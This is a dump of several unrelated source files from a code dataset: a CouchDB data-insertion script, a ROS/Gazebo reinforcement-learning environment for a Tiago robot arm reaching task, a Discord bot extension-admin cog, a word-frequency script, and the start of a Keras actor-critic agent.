node.run_hive_node([\"--enable-stale-production\"])\n return node","sub_path":"tests/functional/python_tests/cli_wallet/tests/utils/node_util.py","file_name":"node_util.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"199972236","text":"import time\nimport 
couchdb\nimport json\nimport base64\nimport sys\n\ncouch = couchdb.Server()\n\ndb = couch['tienda']\t\n\ndef GetCategoria(pNombre):\n\tdb = couch['tienda']\n\tmap_fun = \"function(doc) { if(doc.tipo == 'categoria' && doc.nombre == '%s') emit(doc._id, doc);}\" % (pNombre)\n\treturn db.query(map_fun)\ndef GetVendedor(pNombre,pApellido):\n\tdb = couch['tienda']\n\tmap_fun = \"function(doc) { if(doc.tipo == 'vendedor' && doc.nombre == '%s' && doc.apellido == '%s') emit(doc._id, doc);}\" % (pNombre ,pApellido)\n\treturn db.query(map_fun)\ndef CodificarImagen():\n\tencoded_string = None\n\ttry:\n\t\twith open(\"prueba.jpg\") as image_file:\n\t\t\tencoded_string = base64.b64encode(image_file.read())\n\texcept IOError as e:\n\t\tmensajeError = \"Se presento un problema en la codificacion({0}): {1}\".format(e.errno, e.strerror)\n\t\ttime.sleep(2)\n\t\tencoded_string = None\n\treturn encoded_string\ndef imgBase64(pRuta):\n\tencoded_string = None\n\twith open(\"imagenes/\"+pRuta, \"rb\") as image_file:\n\t\tencoded_string = base64.b64encode(image_file.read())\n\treturn encoded_string\n\ndef scriptInserciones(pRuta):\n\twith open(pRuta) as data_file: \n\t\tdata = json.load(data_file)\n\t\tfor vendedor in data[\"informacion\"]:\n\t\t\tdb = couch['tienda']\n\t\t\t\n\t\t\tmNuevoVendedor = GetVendedor(vendedor[\"nombre\"], vendedor[\"apellido\"])\n\t\t\tif (len(mNuevoVendedor)==0):\n\t\t\t\tmNuevoVendedor = {'tipo': 'vendedor','nombre':vendedor[\"nombre\"], \"apellido\":vendedor[\"apellido\"]}\n\t\t\t\tdb.save(mNuevoVendedor)\n\t\t\telse:\n\t\t\t\tmNuevoVendedor = list(mNuevoVendedor)[0][\"value\"]\n\t\t\t\n\t\t\tfor articulo in vendedor[\"articulos\"]:\n\t\t\t\t\n\t\t\t\tmCategoria = GetCategoria(articulo[\"categoria\"])\n\t\t\t\tif (len(mCategoria) == 0):\n\t\t\t\t\tmCategoria = {'tipo': 'categoria','nombre':articulo[\"categoria\"],\"consulta_num\":0, \"articulos\":[]}\n\t\t\t\t\tdb.save(mCategoria)\n\t\t\t\telse:\n\t\t\t\t\tmCategoria = list(mCategoria)[0][\"value\"]\n\t\t\t\t\n\t\t\t\tmNuevoArticulo = {\"tipo\":\"articulo\",\"nombre\":articulo[\"nombre\"],\"descripcion\":articulo[\"descripcion\"], \"consulta_num\":0, \"vendedor_id\":mNuevoVendedor[\"_id\"], \"foto\": imgBase64(articulo[\"foto\"])}\t\n\t\t\t\tdb.save(mNuevoArticulo)\n\t\t\t\tmCategoria[\"articulos\"].append(mNuevoArticulo['_id'])\n\t\t\t\tdb.save(mCategoria)\n\nCodificarImagen()\n#scriptInserciones('datos.json')\n","sub_path":"CodigoFuente/templates/Sin utilizar/ScriptInsercion.py","file_name":"ScriptInsercion.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"430281665","text":"# python related packages\nimport time\nimport numpy as np\nfrom numpy.linalg import inv, norm\n\nfrom threading import Timer, Lock\nfrom gym import error, spaces, utils\nfrom . 
import ros_general_utils as ros_utils # custom user defined ros utils\nfrom numpy.linalg import inv, norm\nfrom gym_gazebo_ros.envs.tiago_robot.tiago_v0 import TiagoEnv\n\n# ros related data structure\nfrom geometry_msgs.msg import Twist, WrenchStamped, Pose, PoseStamped\n# Used for publishing UR joint angles.\nfrom trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint\nfrom control_msgs.msg import * # control with action interface\nfrom sensor_msgs.msg import LaserScan, JointState\n\n\n# ros related function packages\nimport rospy\nimport transforms3d as tf3d\nfrom gazebo_msgs.msg import ModelState, ContactState, ContactsState\nfrom play_motion_msgs.msg import PlayMotionAction, PlayMotionGoal\n\n# numpy array output format\nnp.set_printoptions(precision=3, suppress=True)\n\"\"\"\nReach task version V0:\nReach a target with a specific orientation\nobervation space: hand pose and relative pose\n\"\"\"\n\n\nclass TiagoReachV0(TiagoEnv):\n def __init__(self):\n super(TiagoReachV0, self).__init__()\n\n # resolve for action space and observation space\n self.hand_joint_names = [\n 'hand_thumb_joint',\n 'hand_index_joint',\n 'hand_mrl_joint']\n self.ctrl_joint_names = []\n self.__joint_pos_lower = []\n self.__joint_pos_upper = []\n self.__joint_vel_upper = []\n self.__joint_vel_lower = []\n self.__joint_force_limits = []\n\n for i, joint in enumerate(self.robot.joints):\n # choose joint groups, e.g. arm, hand, torso and so on\n # TODO: control more groups in future work. this demo just consider\n # arm group\n if joint.joint_type != 'fixed' and (\n joint.name.startswith('arm') is True): # skip hand related joints\n self.ctrl_joint_names.append(joint.name)\n self.__joint_pos_lower.append(\n joint.limit.lower) if joint.limit.lower is not None else self.__joint_pos_lower.append(-np.inf)\n self.__joint_pos_upper.append(\n joint.limit.upper) if joint.limit.upper is not None else self.__joint_pos_upper.append(\n np.inf)\n self.__joint_vel_lower.append(-joint.limit.velocity)\n self.__joint_vel_upper.append(joint.limit.velocity)\n self.__joint_force_limits.append(joint.limit.effort)\n\n print(\n \"joints controlled in this task: {}\".format(\n self.ctrl_joint_names))\n\n # TODO: change the corresponding items according to your task\n # position, action is incremental postion command\n self.action_lower = np.array(\n self.__joint_vel_lower) * self.control_period * .5\n self.action_upper = np.array(\n self.__joint_vel_upper) * self.control_period * .5\n self.action_space = spaces.Box(self.action_lower, self.action_upper)\n\n # (state)observation space: task oriented configuration\n # for this pick and place task states include robot end effector pose, relative pose to target\n # default setting: velocity and force info. is disabled\n\n self.ee_pose_lower = [-np.inf] * 3 + [-1] * 4\n self.ee_pose_upper = [np.inf] * 3 + [-1] * 4\n # position [x,y,z] and quanternion (w,x,y,z)\n self.ee_relative_pose_lower = [-np.inf] * 3 + [-1] * 4\n self.ee_relative_pose_upper = [np.inf] * 3 + [1] * 4\n\n if self.robot_name == 'titanium':\n # include force info. 
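# get_reward further down combines a translational distance with a rotational
# one from ros_utils.distance_of_quaternion, whose source is not in this dump.
# A plausible sketch under the usual convention: a unit quaternion
# q = [w, x, y, z] encodes a rotation of angle 2*arccos(|w|), giving a
# distance in [0, pi] -- consistent with the "[0, 3.14]" comment below.
import numpy as np

def distance_of_quaternion(q):
    w = min(abs(q[0]), 1.0)      # guard arccos against rounding above 1
    return 2.0 * np.arccos(w)

def shaped_reward(dist_trans, dist_rot):
    # Same shaping as the record's get_reward: each term decays smoothly
    # from 0.5 to 0, so the reward lives in (0, 1].
    return 0.5 * np.exp(-2.0 * dist_trans) + 0.5 * np.exp(-dist_rot / np.pi)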
if titanium is used\n self.ft_lower = [-np.inf] * 6\n self.ft_upper = [np.inf] * 6\n else:\n self.ft_lower = []\n self.ft_upper = []\n\n # self.low_full_state = self.ee_relative_pose_lower\n # self.high_full_state = self.ee_relative_pose_upper\n # end effector pos, vec and force.\n self.low_full_state = np.concatenate(\n (self.ee_pose_lower, self.ee_relative_pose_lower))\n self.high_full_state = np.concatenate(\n (self.ee_pose_upper, self.ee_relative_pose_upper))\n self.observation_space = spaces.Box(\n np.array(\n self.low_full_state), np.array(\n self.high_full_state))\n\n # Initialize a target pose for reaching task\n self.ee_target_pose, target_pose = self.spawn_dynamic_reaching_goal(\n 'ball')\n self.goal = target_pose # target pose, data type: geometry_msgs.msg.Pose\n\n # define the number of time step for every step know the time, then it can compute something\n # depend on the time\n self.contact_flag_released = True\n self.contact_flag = False\n self.tolerance = 1e-2 # reaching error threshold\n self.control_period = 0.01\n print(\"finish setup tiago reaching V0 task env.\")\n\n def _step(self, action):\n \"\"\"\n Interact with env with policy learning with RL agent\n action: depend on the action space setting\n Return: state, reward, and done status in this function\n The action command comes from an agent, which is an algorithm used for making decision\n \"\"\"\n # Clip by veloctiy\n print(\"raw action: {}\".format(action))\n # should we used incremental command for a?\n act_clip, curr_goal = self._action_clip(action)\n\n if (action != act_clip).any():\n print(\"cliped action: {}\".format(act_clip))\n print(\"current joint config.: {}\".format(np.array(self.joint_pos)))\n print(\"desired joint config.: {}\".format(np.array(curr_goal)))\n\n rospy.wait_for_service('/gazebo/unpause_physics')\n try:\n self.unpause_physics()\n except (rospy.ServiceException) as e:\n print(\"/gazebo/unpause_physics service call failed\")\n\n try:\n # TODO: actually our action should consider the robot joint limit (including velocity limit)\n # TODO: add action prediction and corresponding terminate condition prediction before take excution\n # TODO: limit action (position translocation), keep every step have a very small moving.\n # we use joint position increment to send to robot\n\n # Control with action client\n self.arm_pos_control_client.wait_for_server()\n rospy.loginfo('connected to robot arm controller server')\n\n g = FollowJointTrajectoryGoal()\n g.trajectory = JointTrajectory()\n g.trajectory.joint_names = self.ctrl_joint_names\n g.trajectory.points = [\n JointTrajectoryPoint(\n positions=curr_goal,\n velocities=[0] * len(action),\n time_from_start=rospy.Duration(\n self.control_period))]\n self.arm_pos_control_client.send_goal(g)\n rospy.loginfo('send position to robot arm')\n\n # bug? 
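# An illustrative aside on the tf3d.affines.compose / np.dot chains used by
# get_ee_state and spawn_dynamic_reaching_goal below: compose(T, R, Z) packs
# a translation, a 3x3 rotation, and per-axis zooms (ones here) into a single
# 4x4 homogeneous matrix, so chaining frames reduces to matrix products. The
# numbers mirror the record's target (x=0.7, y=-0.1, z=1) and hand offset.
import numpy as np
import transforms3d as tf3d

R_b2w = tf3d.quaternions.quat2mat([1.0, 0.0, 0.0, 0.0])       # [w, x, y, z]
T_b2w = tf3d.affines.compose([0.7, -0.1, 1.0], R_b2w, np.ones(3))
T_a2b = tf3d.affines.compose([-0.04, 0.0, 0.0],
                             tf3d.euler.euler2mat(0, 0, 0), np.ones(3))
T_a2w = np.dot(T_b2w, T_a2b)          # T(a->world) = T(b->world) * T(a->b)

trans = T_a2w[:3, 3]                                 # recover translation
quat = tf3d.quaternions.mat2quat(T_a2w[:3, :3])      # recover [w, x, y, z]
assert np.allclose(trans, [0.66, -0.1, 1.0])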
wait for result blocking!\n # self.arm_pos_control_client.wait_for_result()\n time.sleep(self.control_period)\n rospy.loginfo('Execute velocity control for one step')\n result = self.arm_pos_control_client.get_state()\n rospy.loginfo(\n 'task done with state: ' +\n self._get_states_string(result))\n except KeyboardInterrupt:\n self.arm_pos_control_client.cancel_goal()\n\n # get joint data.\n ee_pose, ee_rel_pose, joint_pos, joint_vel = self._get_obs()\n obs_ = ee_pose + ee_rel_pose # next state\n done = self.is_task_done(obs_, joint_vel) # done flag\n reward = self.get_reward(obs_) # reward\n print(\"=================episode: %d, step: %d, reward : %.3f\"\n % (self.current_epi, self.time_step_index, reward))\n\n # (needed by gym) we should return the state(or observation from state(function of state)), reward, and done status.\n # If the task completed, such as distance to target is d > = 0.001,\n # then return done= True, else return done = False. done depend on the terminal conditions partly.\n # NOTE: `reward` always depend on done and action, or state, so it\n # always calculated finally.\n self.joint_pos = joint_pos # update joint state\n self.time_step_index += 1\n return np.array(obs_), reward, done, {}\n\n def get_reward(self, obs):\n \"\"\"\n retrieve reward\n :param obs: current state, include the distance to target and the end effector postion\n :return:\n \"\"\"\n rel_pose = obs[7:]\n dist_trans = norm(rel_pose[:3])\n dist_rot = ros_utils.distance_of_quaternion(rel_pose[3:])\n # tuning is needed\n dist = 0.5 * np.exp(-2 * dist_trans) + 0.5 * np.exp(- dist_rot / np.pi)\n return dist\n\n def _action_clip(self, action):\n \"\"\"\n If action is beyond the current reaching goal, clip the action with the max velocity constraints\n :param action: original action value\n :return: clipped action value\n \"\"\"\n # velocity clip\n action = np.array(action)\n act_clip = action\n if np.any(\n action >= self.action_upper) or np.any(\n action <= self.action_lower):\n print(\"velocity bound clip\")\n act_clip = np.clip(action, self.action_lower, self.action_upper)\n\n # position clip\n curr_joint_pos = np.array(self.joint_pos)\n curr_goal = act_clip + curr_joint_pos\n if np.any(\n curr_goal >= self.__joint_pos_upper) or np.any(\n curr_goal <= self.__joint_pos_lower):\n print(\"joint bound clip\")\n curr_goal = np.clip(\n curr_goal,\n self.__joint_pos_lower,\n self.__joint_pos_upper).tolist()\n # actually used clipped action, we should use this info. to update\n # our policy\n act_clip = curr_goal - curr_joint_pos\n return act_clip, curr_goal\n\n def _get_obs(self):\n \"\"\"\n Return the current observation of the robot and env. e.g. 
end effector pos, target object\n pose, environment objects state, images state\n :return:\n \"\"\"\n joint_data = None\n while joint_data is None:\n rospy.loginfo('try to receive robot joint states...')\n # joint state topic return sensor_msgs/joint_state msg with member\n # pos, vec and effort\n joint_data = rospy.wait_for_message(\n '/joint_states', JointState, timeout=5)\n\n # get joint position and velocity\n idx = [\n i for i, x in enumerate(\n joint_data.name) if x in self.ctrl_joint_names]\n joint_pos = [joint_data.position[i] for i in idx]\n joint_vel = [joint_data.velocity[i] for i in idx]\n print(\"current joint config.: {}\".format(np.array(joint_pos)))\n\n assert ((np.array(joint_pos) <= np.array(self.__joint_pos_upper) +\n 0.009).all() and (np.array(joint_pos) >= np.array(self.__joint_pos_lower) -\n 0.009).all()), 'Illeagal joint state value'\n # get end-effector position and distance to target and end-effector velocity\n # end_pose_vel is end effector pose and velocity,\n # ee_absolute_translation is absolute position\n ee_pose, ee_rel_pose = self.get_ee_state()\n\n # get wrist force sensor data if titanium robot is used\n if self.robot_name == 'titanium':\n force_data_msg = None\n while force_data_msg is None:\n rospy.loginfo('try to receive force sensor data...')\n force_data_msg = rospy.wait_for_message(\n '/wrist_ft', WrenchStamped, timeout=5)\n\n force_data = [\n force_data_msg.wrench.force.x,\n force_data_msg.wrench.force.y,\n force_data_msg.wrench.force.z,\n force_data_msg.wrench.torque.x,\n force_data_msg.wrench.torque.y,\n force_data_msg.wrench.torque.z]\n print('==================your force data is: {}'.format(force_data))\n else:\n force_data = []\n\n return ee_pose, ee_rel_pose, joint_pos, joint_vel\n\n def get_ee_state(self):\n \"\"\"\n Compute distance between end effector and its absolute position\n :return:\n \"\"\"\n rospy.wait_for_service('/gazebo/get_link_state')\n\n if self.robot_name == 'steel':\n # print('End effector is a gripper...')\n try:\n end_state = self.get_link_pose_srv.call(\n 'tiago_steel::arm_7_link', \"world\").link_state\n except (rospy.ServiceException) as exc:\n print(\"/gazebo/get_link_state service call failed:\" + str(exc))\n else:\n # print('End effector is a 5 finger hand....')\n try:\n end_state = self.get_link_pose_srv.call(\n 'tiago_titanium::hand_mrl_link', \"world\").link_state\n except (rospy.ServiceException) as exc:\n print(\"/gazebo/get_link_state service call failed:\" + str(exc))\n\n end_pose_msg = end_state.pose\n ee_vel_msg = end_state.twist\n\n ###### start to extract the msg to data ######\n\n # translate the pose msg type to numpy.ndarray\n q = [\n end_pose_msg.orientation.w,\n end_pose_msg.orientation.x,\n end_pose_msg.orientation.y,\n end_pose_msg.orientation.z]\n Rotation = tf3d.quaternions.quat2mat(q)\n Translation = [\n end_pose_msg.position.x,\n end_pose_msg.position.y,\n end_pose_msg.position.z]\n end_pose_affine = tf3d.affines.compose(\n Translation, Rotation, np.ones(3))\n\n # transform form tool frame to grasp frame\n if self.robot_name == 'steel':\n r1 = tf3d.quaternions.quat2mat([-0.5, 0.5, 0.5, 0.5])\n trans1 = [0, 0, 0.046]\n arm_tool_affine = tf3d.affines.compose(trans1, r1, np.ones(3))\n arm_tool_pose = np.dot(end_pose_affine, arm_tool_affine)\n\n r2 = tf3d.quaternions.quat2mat(\n [5.19362e-12, 0.707107, 1.7312e-12, -0.707107])\n trans2 = [0.01, 0, 0]\n gripper_link_affine = tf3d.affines.compose(trans2, r2, np.ones(3))\n gripper_pose = np.dot(arm_tool_pose, gripper_link_affine)\n\n r3 = 
tf3d.quaternions.quat2mat([0.5, -0.5, 0.5, 0.5])\n trans3 = [0, 0, -0.12]\n grasp_link_affine = tf3d.affines.compose(trans3, r3, np.ones(3))\n end_pose_affine = np.dot(gripper_pose, grasp_link_affine)\n else:\n r = tf3d.quaternions.quat2mat([1, 0, 0, 0])\n trans = [0.13, 0.02, 0]\n grasp_link_affine = tf3d.affines.compose(trans, r, np.ones(3))\n end_pose_affine = np.dot(end_pose_affine, grasp_link_affine)\n\n ee_abs_pos = end_pose_affine[:3, 3].reshape(-1).tolist()\n ee_quat = tf3d.quaternions.mat2quat(end_pose_affine[:3, :3]).tolist()\n ee_pose = ee_abs_pos + ee_quat\n\n # compute the relative pose to target pose (target frame relative the\n # current frame)\n ee_rel_affine = np.dot(inv(end_pose_affine), self.ee_target_pose)\n dist_trans = ee_rel_affine[:3, 3].reshape(-1).tolist()\n dist_quat = tf3d.quaternions.mat2quat(ee_rel_affine[:3, :3]).tolist()\n ee_rel_pose = dist_trans + dist_quat\n\n # form the end-effector twist list\n ee_velocity = [\n ee_vel_msg.linear.x,\n ee_vel_msg.linear.y,\n ee_vel_msg.linear.z,\n ee_vel_msg.angular.x,\n ee_vel_msg.angular.y,\n ee_vel_msg.angular.z]\n\n return ee_pose, ee_rel_pose\n\n def _reset(self, random=False):\n # we should stop our controllers firstly or send the initial joint angles to robot\n # using joint trajectory controller. Or the robot will back to its\n # current position after unpause the simulation\n\n # reset arm position\n print(\"\\n=====================================================================================================\")\n rospy.loginfo('reset environment...')\n\n # reset robot first stage\n self.reset_world()\n self.ee_target_pose, self.goal = self.spawn_dynamic_reaching_goal(\n 'ball', random)\n self._virtual_reset_arm_config()\n\n # self._reset_hand_pose() # no hand, so deprecated\n time.sleep(0.2)\n\n print('===========================================reset done===============================================\\n')\n\n # read data to observation\n\n # update `state`\n # state = self.discretize_observation(data, 5)\n ee_pose, ee_rel_pose, joint_pos, joint_vel = self._get_obs()\n self.joint_pos = joint_pos\n state = ee_pose + ee_rel_pose\n self.current_epi += 1\n return np.array(state)\n\n def spawn_dynamic_reaching_goal(self, model_name, random=False):\n \"\"\"\n spawn an object in Gazebo and return its pose to robot\n :return:\n \"\"\"\n # stop simulation\n rospy.wait_for_service('/gazebo/unpause_physics')\n try:\n self.unpause_physics()\n except (rospy.ServiceException) as exc:\n print(\"/gazebo/unpause_physics service call failed:\" + str(exc))\n\n x = 0.7\n y = -0.1\n z = 1\n modelState = ModelState()\n modelState.model_name = model_name\n modelState.pose.orientation.x = 0\n modelState.pose.orientation.y = 0\n modelState.pose.orientation.z = 0\n modelState.pose.orientation.w = 1\n modelState.reference_frame = 'world'\n\n if random:\n modelState.pose.position.x = x + np.random.sample() * 0.4 - 0.2\n modelState.pose.position.y = y\n modelState.pose.position.z = z + np.random.sample() * 0.4 - 0.2\n else:\n modelState.pose.position.x = x\n modelState.pose.position.y = y\n modelState.pose.position.z = z\n\n self.set_model_state(modelState)\n\n Rotation = tf3d.quaternions.quat2mat(\n [\n modelState.pose.orientation.w,\n modelState.pose.orientation.x,\n modelState.pose.orientation.y,\n modelState.pose.orientation.z])\n Translation = [\n modelState.pose.position.x,\n modelState.pose.position.y,\n modelState.pose.position.z]\n target_pose = tf3d.affines.compose(Translation, Rotation, np.ones(3))\n\n # the hand pose is 
relative to the target\n hand2ball_trans = [-0.04, 0, 0]\n hand2ball_rot = tf3d.euler.euler2mat(0, 0, 0)\n hand2ball_affine = tf3d.affines.compose(\n hand2ball_trans, hand2ball_rot, np.ones(3))\n # T(hand2world) = T(ball2world) * T(hand2ball)\n hand_pose_mat = np.dot(target_pose, hand2ball_affine)\n hand_translation = hand_pose_mat[:3, 3].reshape(-1)\n hand_quat = tf3d.quaternions.mat2quat(\n hand_pose_mat[:3, :3]) # quaternion [w, x, y, z]\n\n hand_pos = Pose()\n hand_pos.position.x = hand_translation[0]\n hand_pos.position.y = hand_translation[1]\n hand_pos.position.z = hand_translation[2]\n hand_pos.orientation.w = hand_quat[0]\n hand_pos.orientation.x = hand_quat[1]\n hand_pos.orientation.y = hand_quat[2]\n hand_pos.orientation.z = hand_quat[3]\n\n # hand_pose = modelState.pose # different from the target pose\n # hand_pose.position.x = x - 0.1\n return hand_pose_mat, hand_pos\n\n def is_task_done(self, state, joint_vel):\n\n self.lock.acquire()\n contact_flag = self.contact_flag\n self.lock.release()\n\n # extract end position distance from state\n obs = state[7:]\n dist = norm(np.array(obs[:3]))\n dist_ori = ros_utils.distance_of_quaternion(obs[3:]) # [0, 3.14]\n\n # TODO: add collision detection to cancel wrong/bad/negative trial!\n # TODO: add end-effector force sensor data to terminate the trial\n\n # if np.any(np.greater(np.fabs(joint_vel), self.__joint_vel_upper)):\n # print('DONE, robot joint velocity exceed the joint velocity limit')\n # return True\n\n if dist >= 0.7:\n print(\"DONE, too far away from the target\")\n return True\n elif dist_ori >= 1.57:\n print(\"DONE, wrong direction\")\n return True\n elif contact_flag:\n print(\"DONE, collision with objects\")\n self.contact_flag = False\n return True\n elif dist <= self.tolerance and dist_ori <= 0.2:\n print(\"DONE, task succeed\")\n return True\n else:\n return False\n","sub_path":"gym_gazebo_ros/envs/tiago_robot/tiago_reach_v0.py","file_name":"tiago_reach_v0.py","file_ext":"py","file_size_in_byte":20984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"351547569","text":"import os\nfrom pathlib import Path\nfrom typing import List\nfrom discord.ext import commands\nfrom discord.ext.commands import ExtensionNotFound, ExtensionAlreadyLoaded, ExtensionNotLoaded, NoEntryPointError, ExtensionFailed\n\nclass ExtensionAdmin(commands.Cog):\n \"\"\" Extension Admin Commands \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n def extension_path(self, ext: str) -> Path:\n path = Path(self.bot.data_path, 'extensions', ext)\n path = path.relative_to(Path('.').resolve())\n return path\n\n def extension_import(self, ext: str) -> str:\n path = self.extension_path(ext)\n return str(path).replace('/','.')\n\n def loaded_extensions(self) -> List[str]:\n prefix = self.extension_import('') + \".\"\n return [f.replace(prefix,'') for f in self.bot.extensions]\n\n def available_extensions(self) -> List[str]:\n exts = []\n prefix = self.extension_import('') + \".\"\n loaded_extensions = self.loaded_extensions()\n for child in self.extension_path('').iterdir():\n if str(child) in self.bot.config.extension_filters:\n continue\n if child.is_dir():\n if child.joinpath('__init__.py').exists():\n ext_module = str(child).replace('/','.').replace(prefix,'')\n if ext_module not in loaded_extensions:\n exts.append(ext_module)\n return exts\n\n @commands.command()\n @commands.is_owner()\n async def load(self, ctx, *, extension : str):\n e = self.extension_import(extension)\n try:\n 
self.bot.load_extension(e)\n if e not in self.bot.config.extensions:\n self.bot.config.extensions.append(e)\n self.bot.config.save()\n await ctx.message.channel.send('Extension loaded: {}'.format(extension))\n except ExtensionNotFound:\n await ctx.message.channel.send('Extension not found: {}'.format(extension))\n except ExtensionAlreadyLoaded:\n await ctx.message.channel.send('Extension already loaded: {}'.format(extension))\n except NoEntryPointError:\n await ctx.message.channel.send('Exension has no setup function: {}'.format(extension))\n except ExtensionFailed as e:\n await ctx.message.channel.send('Extension failed: {}, {}'.format(extension, e))\n raise e\n\n @commands.command()\n @commands.is_owner()\n async def unload(self, ctx, *, extension : str):\n e = self.extension_import(extension)\n try:\n self.bot.unload_extension(e)\n await ctx.message.channel.send('Extension unloaded: {}'.format(extension))\n except ExtensionNotLoaded:\n await ctx.message.channel.send('Extension not loaded: {}'.format(extension))\n if e in self.bot.config.extensions:\n self.bot.config.extensions.remove(e)\n self.bot.config.save()\n\n @commands.command()\n @commands.is_owner()\n async def reload(self, ctx, *, extension : str):\n e = self.extension_import(extension)\n try:\n self.bot.reload_extension(e)\n await ctx.message.channel.send('Extension reloaded: {}'.format(extension))\n except ExtensionNotLoaded:\n await ctx.message.channel.send('Extension not loaded: {}'.format(extension))\n except ExtensionNotFound:\n await ctx.message.channel.send('Extension not found: {}'.format(extension))\n except NoEntryPointError:\n await ctx.message.channel.send('Exension has no setup function: {}'.format(extension))\n except ExtensionFailed as e:\n await ctx.message.channel.send('Extension failed: {}, {}'.format(extension, e))\n\n @commands.command()\n @commands.is_owner()\n async def available(self, ctx):\n channel = ctx.message.channel\n exts = None\n with channel.typing():\n exts = [\"- {}\".format(e) for e in self.available_extensions()]\n if exts:\n exts.sort()\n await channel.send('Extensions:\\n```{}```'.format(\"\\n\".join(exts)))\n else:\n await channel.send('No extensions found')\n\n @commands.command()\n @commands.is_owner()\n async def loaded(self, ctx):\n channel = ctx.message.channel\n exts = None\n await channel.send('Prefix: {}'.format(self.extension_import('')))\n with channel.typing():\n exts = [\"- {}\".format(e) for e in self.loaded_extensions()]\n if exts:\n exts.sort()\n await channel.send('Extensions:\\n```{}```'.format(\"\\n\".join(exts)))\n else:\n await channel.send('No extensions found')\n\n\n","sub_path":"extensions/admin_extension/bot_admin.py","file_name":"bot_admin.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"311040034","text":"#text stats test\n\"\"\"文本统计程序\n\"\"\"\nfrom time import clock #使用time库中的clock函数来计时\n\nkeep_chr = \"qwertyuiopasdfghjklzxcvbnm -'\"\nkeep = {''} #如果不加上''的话会默认keep为字典而非集合\nfor c in keep_chr:\n keep.add(c)\nkeep.remove('')\n\ndef normalize(s):\n \"\"\"标准化字符串\n \"\"\"\n result = ''\n for c in s.lower():\n if c in keep:\n result += c\n return result\n\ndef textstats(s):\n \"\"\"字符统计函数,返回字典\n \"\"\"\n s= normalize(s)\n words = s.split()\n counts = {}#空字典,用来存储\n for w in words:\n counts[w] = counts.get(w, 0) + 1\n #get的使用方法:查找w的值,找到则返回值,找不到则返回指定值\n return counts\n\ndef get_top(dict):\n \"\"\"输入一个字典,对字典中的值进行排序,并返回列表\n \"\"\" \n lst = []\n for k in dict:\n part = 
(dict[k], k)\n lst.append(part)\n lst.sort()\n lst.reverse()\n return lst\n\ndef main():\n txt = open(input(\"please input file name: \"),'r', encoding = 'UTF-8').read()\n clock()#时间初始化\n #信息输出\n print(\"基本信息输出......\")\n print(\"字符数:\",len(txt))\n print(\"行数:\",txt.count('\\n'))\n print(\"词数:\",len(normalize(txt).split()))\n print(\"高频词汇......\")\n lst = get_top(textstats(txt))\n for i in range(10):\n print(\"No.{n:2} {word:15}{times}\".format(n=i+1,\n word=lst[i][1],\n times=lst[i][0]))\n print('用时: %.3fs' %clock())#第二次调用clock将会返回计时\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"primer/textstats.py","file_name":"textstats.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"652470304","text":"import warnings\nwarnings.filterwarnings('ignore')\nimport multiprocessing\nimport os\nimport pickle\nimport numpy as np\nimport gym\nimport tensorflow as tf\nfrom keras.layers import Dense, Activation, Dropout, Input\nfrom keras.models import Sequential, Model, load_model, model_from_json\nfrom keras.optimizers import Adam\nimport keras.backend as K\nfrom collections import deque\nfrom timeit import default_timer as timer\nfrom tqdm import tqdm\nfrom copy import deepcopy\nimport random\n\nclass PolicyEstimator:\n def __init__(self, env, name=None, gamma=0.99, n_steps=5):\n # Environment specifics\n self.env = env\n self.env_name = env.unwrapped.spec.id\n self.gamma = gamma\n self.G_n, self.advantages = 0, 0\n self.n_steps = n_steps\n self.input_shape = env.observation_space.shape\n self.n_outputs = env.action_space.n\n self.action_space = [i for i in range(self.n_outputs)]\n # Neural network architecture\n self.p1_dims = 50\n self.p2_dims = 50\n self.v1_dims = 250\n self.v2_dims = 250\n self.lr1, self.lr2 = 1e-3, 1e-3\n # Memory\n self.states, self.actions, self.rewards, self.next_states, self.g_ns = [], [], [], [], []\n self.REPLAY_MEMORY = deque(maxlen=10000)\n self.MIN_REPLAY_MEMORY_SIZE = 1000 # Minimum number of steps in a memory to start training\n self.UPDATE_TARGET_EVERY = 2 # How often to sync. 
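# learn() below builds n-step returns by convolving rewards with a flipped
# discount filter. A worked mini-check of that identity in plain numpy:
# the last len(rewards) entries of the full convolution satisfy
# G_n[t] = sum_{k=0}^{n-1} gamma**k * r[t+k], truncated at the episode end.
import numpy as np

gamma, n_steps = 0.5, 2
rewards = np.array([1.0, 1.0, 1.0])
discount_filter = np.flip(gamma ** np.arange(0, n_steps))        # [0.5, 1.0]
G_n = np.convolve(rewards, discount_filter)[-rewards.shape[0]:]
assert np.allclose(G_n, [1.5, 1.5, 1.0])  # r_t + gamma*r_{t+1}; zero past the end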
target and true value networks\n self.MINIBATCH_SIZE = 32\n self.target_update_counter = 0\n # Stats for tracking performance\n self.scores = []\n self.weights1 = [] # First weight matrix\n self.weights2 = [] # Second weight matrix\n\n self.policy_nn, self.predict_nn, self.value_nn = self.create_models()\n self.target_value_nn = deepcopy(self.value_nn) # Target network used for stabilisation\n\n if name:\n subdir_name = \"/\".join([self.env_name, name])\n self.scores = pickle.load(open(\"{}/scores.p\".format(subdir_name),\"rb\"))\n self.policy_nn.load_weights(\"{}/PolicyNN-weights.h5\".format(subdir_name))\n self.predict_nn.load_weights(\"{}/PredictNN-weights.h5\".format(subdir_name))\n\n def create_models(self):\n input = Input(shape=self.input_shape)\n advantages = Input(shape=[1])\n dense1 = Dense(self.p1_dims, activation=\"relu\")(input)\n dense2 = Dense(self.p2_dims, activation=\"relu\")(dense1)\n probs = Dense(self.n_outputs, activation=\"softmax\")(dense2)\n\n #v_input = Input(shape=self.input_shape)\n v_dense1 = Dense(self.v1_dims, activation=\"relu\")(input)\n v_dense2 = Dense(self.v2_dims, activation=\"relu\")(v_dense1)\n v_out = Dense(1, activation=\"linear\")(v_dense2)\n value_nn = Model(input=[input], output=[v_out])\n #value_nn.compile(optimizer=Adam(lr=self.lr1), loss='mse')\n value_nn.compile(optimizer=\"rmsprop\", loss='mse')\n\n 